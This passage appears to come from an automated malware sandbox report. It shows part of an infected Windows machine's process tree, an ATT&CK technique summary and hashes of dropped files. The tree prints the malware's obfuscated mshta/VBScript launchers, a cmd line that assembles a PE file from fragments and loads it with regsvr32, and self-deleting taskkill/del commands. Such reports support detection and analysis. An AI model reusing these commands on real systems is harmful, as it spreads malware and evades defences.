                                                                                                                                                          "C:\Users\Admin\AppData\Local\6f01e654-c5a7-4af4-b6b4-a2703ab2c7df\build2.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:6068
                                                                                                                                                          • C:\Users\Admin\AppData\Local\6f01e654-c5a7-4af4-b6b4-a2703ab2c7df\build2.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\6f01e654-c5a7-4af4-b6b4-a2703ab2c7df\build2.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            PID:5364
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\6f01e654-c5a7-4af4-b6b4-a2703ab2c7df\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                              7⤵
                                                                                                                                                                PID:5444
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill /im build2.exe /f
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:2168
                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                  timeout /t 6
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:1820
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\908E.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\908E.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5884
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3673.bat" "
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5408
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9503.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\9503.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:188
                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            "C:\Windows\System32\mshta.exe" vBscRipt: ClOse ( CReateObjEct ( "WsCriPT.SHelL" ). RUN ( "C:\Windows\system32\cmd.exe /c COPy /Y ""C:\Users\Admin\AppData\Local\Temp\9503.exe"" ..\NLys4I2S6W1ZR1.exe && stArt ..\NLyS4i2S6W1ZR1.exe /pcloSjrIsE8gkVnrJWyyJCDe8 & IF """" == """" for %U IN ( ""C:\Users\Admin\AppData\Local\Temp\9503.exe"" ) do taskkill /f -Im ""%~NxU"" " , 0, TRue ) )
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4880
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c COPy /Y "C:\Users\Admin\AppData\Local\Temp\9503.exe" ..\NLys4I2S6W1ZR1.exe && stArt ..\NLyS4i2S6W1ZR1.exe /pcloSjrIsE8gkVnrJWyyJCDe8 & IF "" == "" for %U IN ( "C:\Users\Admin\AppData\Local\Temp\9503.exe" ) do taskkill /f -Im "%~NxU"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4344
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\NLys4I2S6W1ZR1.exe
                                                                                                                                                                    ..\NLyS4i2S6W1ZR1.exe /pcloSjrIsE8gkVnrJWyyJCDe8
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:4964
                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vBscRipt: ClOse ( CReateObjEct ( "WsCriPT.SHelL" ). RUN ( "C:\Windows\system32\cmd.exe /c COPy /Y ""C:\Users\Admin\AppData\Local\Temp\NLys4I2S6W1ZR1.exe"" ..\NLys4I2S6W1ZR1.exe && stArt ..\NLyS4i2S6W1ZR1.exe /pcloSjrIsE8gkVnrJWyyJCDe8 & IF ""/pcloSjrIsE8gkVnrJWyyJCDe8 "" == """" for %U IN ( ""C:\Users\Admin\AppData\Local\Temp\NLys4I2S6W1ZR1.exe"" ) do taskkill /f -Im ""%~NxU"" " , 0, TRue ) )
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:4224
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c COPy /Y "C:\Users\Admin\AppData\Local\Temp\NLys4I2S6W1ZR1.exe" ..\NLys4I2S6W1ZR1.exe && stArt ..\NLyS4i2S6W1ZR1.exe /pcloSjrIsE8gkVnrJWyyJCDe8 & IF "/pcloSjrIsE8gkVnrJWyyJCDe8 " == "" for %U IN ( "C:\Users\Admin\AppData\Local\Temp\NLys4I2S6W1ZR1.exe" ) do taskkill /f -Im "%~NxU"
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:4636
                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vbsCrIpt: CloSE( crEatEObjeCt( "wScRiPt.ShELl" ).RUn ( "C:\Windows\system32\cmd.exe /Q /C EchO XlC:\Users\Admin\AppData\Local\Tempw> HQTV.EH &ecHO | SET /p = ""MZ"" > 7rHb.RV5 & cOPY /Y /b 7RhB.RV5 + ~FwZLB7.9 + DTGLKO.TO+ 2N3OKV.k + XVBa.6f +NXQTswCP.WJN + HqTv.EH ..\RKRK.tb & sTART regsvr32.exe -S ..\RKRK.tB /u& deL /Q * " , 0 , tRuE ) )
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:2104
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /Q /C EchO XlC:\Users\Admin\AppData\Local\Tempw> HQTV.EH &ecHO | SET /p = "MZ" > 7rHb.RV5 & cOPY /Y /b 7RhB.RV5 + ~FwZLB7.9 + DTGLKO.TO+ 2N3OKV.k +XVBa.6f +NXQTswCP.WJN + HqTv.EH ..\RKRK.tb & sTART regsvr32.exe -S ..\RKRK.tB /u& deL /Q *
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4088
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>7rHb.RV5"
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:5620
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" ecHO "
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:5524
                                                                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                        regsvr32.exe -S ..\RKRK.tB /u
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                                        PID:4008
                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                  taskkill /f -Im "9503.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:5276
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\97F2.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\97F2.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            PID:1780
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 97F2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\97F2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:644
                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                  taskkill /im 97F2.exe /f
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:5704
                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                  PID:5888
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7F6E.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7F6E.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5596
                                                                                                                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                  "C:\Windows\System32\regsvr32.exe" .\j~jW~Hz.C9 /u -S
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:5192

                                                                                                                                                                              Network

                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                              Execution

                                                                                                                                                                              Scheduled Task

                                                                                                                                                                              1
                                                                                                                                                                              T1053

                                                                                                                                                                              Persistence

                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                              2
                                                                                                                                                                              T1031

                                                                                                                                                                              New Service

                                                                                                                                                                              1
                                                                                                                                                                              T1050

                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                              2
                                                                                                                                                                              T1060

                                                                                                                                                                              Scheduled Task

                                                                                                                                                                              1
                                                                                                                                                                              T1053

                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                              New Service

                                                                                                                                                                              1
                                                                                                                                                                              T1050

                                                                                                                                                                              Scheduled Task

                                                                                                                                                                              1
                                                                                                                                                                              T1053

                                                                                                                                                                              Defense Evasion

                                                                                                                                                                              Modify Registry

                                                                                                                                                                              5
                                                                                                                                                                              T1112

                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                              2
                                                                                                                                                                              T1089

                                                                                                                                                                              File Deletion

                                                                                                                                                                              2
                                                                                                                                                                              T1107

                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                              3
                                                                                                                                                                              T1497

                                                                                                                                                                              File Permissions Modification

                                                                                                                                                                              1
                                                                                                                                                                              T1222

                                                                                                                                                                              Install Root Certificate

                                                                                                                                                                              1
                                                                                                                                                                              T1130

                                                                                                                                                                              Credential Access

                                                                                                                                                                              Credentials in Files

                                                                                                                                                                              4
                                                                                                                                                                              T1081

                                                                                                                                                                              Discovery

                                                                                                                                                                              Query Registry

                                                                                                                                                                              10
                                                                                                                                                                              T1012

                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                              3
                                                                                                                                                                              T1497

                                                                                                                                                                              System Information Discovery

                                                                                                                                                                              8
                                                                                                                                                                              T1082

                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                              3
                                                                                                                                                                              T1120

                                                                                                                                                                              Collection

                                                                                                                                                                              Data from Local System

                                                                                                                                                                              4
                                                                                                                                                                              T1005

                                                                                                                                                                              Command and Control

                                                                                                                                                                              Web Service

                                                                                                                                                                              1
                                                                                                                                                                              T1102

                                                                                                                                                                              Impact

                                                                                                                                                                              Inhibit System Recovery

                                                                                                                                                                              2
                                                                                                                                                                              T1490

                                                                                                                                                                              Replay Monitor

                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                              Downloads

                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                MD5

                                                                                                                                                                                c6fb460b8e8319dd038a16ea4278db7d

                                                                                                                                                                                SHA1

                                                                                                                                                                                f2aa54fe8bd3a6d361463c7238d8c1c4029048f9

                                                                                                                                                                                SHA256

                                                                                                                                                                                519404049ce48f6461107857de461bc70a48bd6ac01fed3576b7267c109e5fc8

                                                                                                                                                                                SHA512

                                                                                                                                                                                54b02f6f8775b9197eb29dcb9afb4985b59549dd045bf311913908caabca49113cada66b5b30624fe7ceb5ea90eaa6825a6414d76a08f9e874eb8a7d5c1c8c83

                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                MD5

                                                                                                                                                                                ecf91a43c5ddf334d91c20e8733039e3

                                                                                                                                                                                SHA1

                                                                                                                                                                                68a9a48d5b65fc7dac9163237ce25b034a4d7076

                                                                                                                                                                                SHA256

                                                                                                                                                                                801cdd408dd6f2c3743041e6b38caa4bb2ee848a88dbbfec8021dee62b195c09

                                                                                                                                                                                SHA512

                                                                                                                                                                                b6b55715b6c7741993e9c0bbcdf8f736e0f7adb9fb61a1c75493f13414dd0e330735a7d87ea3bece8ce293fddc6c102029ec4c297ed1466ef77a13eda3d333f7

                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                MD5

                                                                                                                                                                                d16956c0283534ab86fc55b301e00298

                                                                                                                                                                                SHA1

                                                                                                                                                                                732bb1d1c04804480592bd1939b2241f0738ac61

                                                                                                                                                                                SHA256

                                                                                                                                                                                63c78c4373bf886affd6e589b5b30f78007155e3e2522cafe26489cb062fbe61

                                                                                                                                                                                SHA512

                                                                                                                                                                                afabcbd864a76164a7a9a1e3e3e083672e11095743251107ae4943bd6d2582cb5e76568a68e2276a6c0e681f40e1b1e2172e63bf48815bfe358aee173c0790d6

                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                MD5

                                                                                                                                                                                54fb2264796169baedd31fd82f9f1e72

                                                                                                                                                                                SHA1

                                                                                                                                                                                f441734ee3f07325cd18489922afb179f9fff392

                                                                                                                                                                                SHA256

                                                                                                                                                                                ec681510529d981d4d81ee4a573e0dd1d154eb2630f9144488f50d405134d29b

                                                                                                                                                                                SHA512

                                                                                                                                                                                ad38f031606c054210a32554364e0132133957e09602174bf0bf92aa491596b33562c1efe20e9ab89a58fdb583eb93e1a1bbe586485fabd58e2df1f57d24fb95

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\libcurl.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                SHA1

                                                                                                                                                                                028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                SHA256

                                                                                                                                                                                0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                SHA512

                                                                                                                                                                                857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\libcurlpp.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                SHA1

                                                                                                                                                                                b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                SHA256

                                                                                                                                                                                43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                SHA512

                                                                                                                                                                                9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\libgcc_s_dw2-1.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                SHA1

                                                                                                                                                                                64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                SHA256

                                                                                                                                                                                59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                SHA512

                                                                                                                                                                                0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\libstdc++-6.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                SHA1

                                                                                                                                                                                8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                SHA256

                                                                                                                                                                                97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                SHA512

                                                                                                                                                                                666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\libwinpthread-1.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                SHA1

                                                                                                                                                                                fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                SHA256

                                                                                                                                                                                509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                SHA512

                                                                                                                                                                                3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\setup_install.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                SHA1

                                                                                                                                                                                e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                SHA256

                                                                                                                                                                                0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                SHA512

                                                                                                                                                                                c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\setup_install.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                SHA1

                                                                                                                                                                                e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                SHA256

                                                                                                                                                                                0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                SHA512

                                                                                                                                                                                c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_1.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                SHA1

                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                SHA256

                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                SHA512

                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_1.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                SHA1

                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                SHA256

                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                SHA512

                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_1.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                SHA1

                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                SHA256

                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                SHA512

                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_2.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                SHA1

                                                                                                                                                                                f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                SHA256

                                                                                                                                                                                365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                SHA512

                                                                                                                                                                                db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_2.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                SHA1

                                                                                                                                                                                f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                SHA256

                                                                                                                                                                                365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                SHA512

                                                                                                                                                                                db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_3.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                SHA1

                                                                                                                                                                                979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                SHA256

                                                                                                                                                                                d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                SHA512

                                                                                                                                                                                fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_3.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                SHA1

                                                                                                                                                                                979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                SHA256

                                                                                                                                                                                d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                SHA512

                                                                                                                                                                                fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_4.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                SHA1

                                                                                                                                                                                cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                SHA256

                                                                                                                                                                                755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                SHA512

                                                                                                                                                                                c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_4.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                SHA1

                                                                                                                                                                                cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                SHA256

                                                                                                                                                                                755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                SHA512

                                                                                                                                                                                c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_5.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                SHA1

                                                                                                                                                                                0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                SHA256

                                                                                                                                                                                8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                SHA512

                                                                                                                                                                                bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_5.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                SHA1

                                                                                                                                                                                0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                SHA256

                                                                                                                                                                                8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                SHA512

                                                                                                                                                                                bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_6.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                SHA1

                                                                                                                                                                                82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                SHA256

                                                                                                                                                                                a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                SHA512

                                                                                                                                                                                f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_6.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                SHA1

                                                                                                                                                                                82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                SHA256

                                                                                                                                                                                a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                SHA512

                                                                                                                                                                                f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                56bd0f698f28e63479e5697dd167926e

                                                                                                                                                                                SHA1

                                                                                                                                                                                a65ab942eb3b3ac45ecf24cf1a35d2734f14d666

                                                                                                                                                                                SHA256

                                                                                                                                                                                6a481c56aa97b2a75a3de488ce1a9a670c62fc364a432e8e68497f55fabb439d

                                                                                                                                                                                SHA512

                                                                                                                                                                                f8900374349e22a2eb2c4ae2598bb1ed5b0dd3ca2857e2fb10d2ed3474fea49a810eb92eb3a81e861bd47c54698fa934fe086bca7da6a1f164c34753b6d391f2

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                56bd0f698f28e63479e5697dd167926e

                                                                                                                                                                                SHA1

                                                                                                                                                                                a65ab942eb3b3ac45ecf24cf1a35d2734f14d666

                                                                                                                                                                                SHA256

                                                                                                                                                                                6a481c56aa97b2a75a3de488ce1a9a670c62fc364a432e8e68497f55fabb439d

                                                                                                                                                                                SHA512

                                                                                                                                                                                f8900374349e22a2eb2c4ae2598bb1ed5b0dd3ca2857e2fb10d2ed3474fea49a810eb92eb3a81e861bd47c54698fa934fe086bca7da6a1f164c34753b6d391f2

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                MD5

                                                                                                                                                                                99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                SHA1

                                                                                                                                                                                d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                SHA256

                                                                                                                                                                                586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                SHA512

